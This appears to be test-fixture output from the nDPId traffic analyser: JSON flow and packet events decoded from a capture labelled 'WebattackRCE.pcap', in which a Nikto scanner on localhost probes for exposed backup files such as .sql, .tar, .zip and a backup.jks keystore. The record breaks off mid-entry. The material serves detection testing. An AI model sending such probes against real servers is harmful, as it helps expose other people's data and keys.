{"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276996,"pkt":"AAAAAAAAAAAAAAAACABFAADD0zFAAEAGaQF\/AAABfwAAAcMqH5Dy3etP7K3wrYAYAED+twAAAQEICp1m\/CydZvwsR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276998,"pkt":"AAAAAAAAAAAAAAAACABFAADDYPVAAEAG2z1\/AAABfwAAAcMsH5ARV1iTIbZBJoAYAED+twAAAQEICp1m\/C2dZvwtR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276999,"pkt":"AAAAAAAAAAAAAAAACABFAADByvVAAEAGcT9\/AAABfwAAAcMuH5AHevKTkcnpoIAYAED+tQAAAQEICp1m\/C+dZvwvR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277000,"pkt":"AAAAAAAAAAAAAAAACABFAADBBihAAEAGNg1\/AAABfwAAAcMwH5BEgD5FJ0MuU4AYAED+tQAAAQEICp1m\/DCdZvwwR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277001,"pkt":"AAAAAAAAAAAAAAAACABFAADAM9pAAEAGCFx\/AAABfwAAAcMyH5CilAu7EPfGmYAYAED+tAAAAQEICp1m\/DGdZvwxR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277002,"pkt":"AAAAAAAAAAAAAAAACABFAADAUGZAAEAG689\/AAABfwAAAcM0H5Crr2gHBF6lfIAYAED+tAAAAQEICp1m\/DKdZvwyR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277004,"pkt":"AAAAAAAAAAAAAAAACABFAADBfrVAAEAGvX9\/AAABfwAAAcM2H5AiEUbRArZM2IAYAED+tQAAAQEICp1m\/DSdZvw0R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277006,"pkt":"AAAAAAAAAAAAAAAACABFAADBggJAAEAGujJ\/AAABfwAAAcM4H5AaCbpkhn3rTYAYAED+tQAAAQEICp1m\/DadZvw1R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277007,"pkt":"AAAAAAAAAAAAAAAACABFAADC7TtAAEAGTvh\/AAABfwAAAcM6H5D6jdVeqyQPZoAYAED+tgAAAQEICp1m\/DedZvw3R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277010,"pkt":"AAAAAAAAAAAAAAAACABFAADChG5AAEAGt8V\/AAABfwAAAcM8H5BcKrwJSZEDE4AYAED+tgAAAQEICp1m\/DqdZvw6R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277011,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/sClAAEAGjA1\/AAABfwAAAcM+H5BuqIhDc4THFIAYAED+swAAAQEICp1m\/DudZvw7R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 